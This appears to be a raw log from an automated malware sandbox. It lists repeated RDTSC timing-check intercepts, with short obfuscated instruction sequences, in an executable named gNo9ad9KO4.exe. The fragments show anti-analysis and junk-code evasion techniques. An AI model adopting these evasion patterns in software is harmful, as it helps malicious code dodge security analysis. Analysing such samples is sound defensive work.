Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C32F4 second address: 3C3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 337B54 second address: 337B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C672D second address: 3C673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CBCF0 second address: 3CBCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CBCF9 second address: 3CBCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB23A second address: 3CB266 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB3A3 second address: 3CB3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB3A9 second address: 3CB3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB716 second address: 3CB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D13DC second address: 3D141D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4688C929FDh 0x0000000b jmp 00007F4688C929DEh 0x00000010 jmp 00007F4688C929E9h 0x00000015 pushad 0x00000016 jng 00007F4688C929D6h 0x0000001c jo 00007F4688C929D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1715 second address: 3D1719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1719 second address: 3D1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1726 second address: 3D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1F93 second address: 3D1FA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C929D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1FA3 second address: 3D1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D1FA7 second address: 3D1FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D2306 second address: 3D230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D230C second address: 3D239C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4688C929E2h 0x0000000f jno 00007F4688C929D6h 0x00000015 jc 00007F4688C929D6h 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 jng 00007F4688C929D6h 0x0000002a jmp 00007F4688C929E2h 0x0000002f popad 0x00000030 js 00007F4688C929E7h 0x00000036 jmp 00007F4688C929DBh 0x0000003b je 00007F4688C929D6h 0x00000041 pushad 0x00000042 jmp 00007F4688C929E9h 0x00000047 jbe 00007F4688C929D6h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007F4688C929D6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D239C second address: 3D23A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4688C1B766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D25D6 second address: 3D25DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D25DC second address: 3D25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D287E second address: 3D2882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D2882 second address: 3D288A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D99F4 second address: 3D9A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4688C929D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8B1D second address: 3D8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F4688C1B766h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8B2E second address: 3D8B38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4688C929D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8C95 second address: 3D8CBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007F4688C1B766h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D8CBD second address: 3D8CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D937A second address: 3D937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D937E second address: 3D938C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D938C second address: 3D93A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007F4688C1B76Ch 0x0000000e jnp 00007F4688C1B766h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D94F4 second address: 3D9500 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C929D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D9500 second address: 3D951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D951A second address: 3D9531 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4688C929D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D9531 second address: 3D9560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3D96E8 second address: 3D96F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3DE358 second address: 3DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3DE362 second address: 3DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E533B second address: 3E5349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4688C1B766h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E565F second address: 3E5697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 push ebx 0x00000014 jo 00007F4688C929D6h 0x0000001a jno 00007F4688C929D6h 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5697 second address: 3E569D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E569D second address: 3E56AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E586A second address: 3E5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5A0A second address: 3E5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5A10 second address: 3E5A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CC0 second address: 3E5CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F4688C929E5h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CDF second address: 3E5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3E5CE5 second address: 3E5D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 jng 00007F4688C929F3h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED0E1 second address: 3ED0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED21F second address: 3ED235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C929DDh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED235 second address: 3ED23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED23D second address: 3ED241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED39C second address: 3ED3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED3A0 second address: 3ED3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ED3A6 second address: 3ED3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3EF8C7 second address: 3EF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F4688C929D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jp 00007F4688C929D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB48 second address: 32DB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB4E second address: 32DB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB57 second address: 32DB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32DB5B second address: 32DB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD339 second address: 3FD361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B76Bh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F4688C1B766h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD4AD second address: 3FD4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3FD4B5 second address: 3FD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 4004F9 second address: 40051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4688C929E1h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 40051C second address: 40053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4688C1B770h 0x0000000f jmp 00007F4688C1B76Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 40053A second address: 40053F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 411FC0 second address: 411FC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 411E0B second address: 411E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4688C929EDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B9C4 second address: 41B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B9CA second address: 41B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6A9 second address: 41A6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6BD second address: 41A6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6C3 second address: 41A6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41A6D6 second address: 41A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4688C929DCh 0x0000000b jno 00007F4688C929D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41AAF1 second address: 41AAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41B71F second address: 41B72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F4688C929D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 41E331 second address: 41E33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 44076B second address: 44076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45955F second address: 459565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459807 second address: 45980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45980C second address: 45981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F4688C1B766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45981E second address: 459822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459970 second address: 459978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459978 second address: 45997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45997C second address: 4599A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 jng 00007F4688C1B766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4688C1B770h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jc 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 4599A7 second address: 4599B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459E99 second address: 459EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 459EA1 second address: 459EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A00F second address: 45A013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A013 second address: 45A023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A023 second address: 45A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A027 second address: 45A04D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jo 00007F4688C929E2h 0x00000010 jg 00007F4688C929D6h 0x00000016 jo 00007F4688C929D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 je 00007F4688C929D6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A04D second address: 45A051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45A051 second address: 45A057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
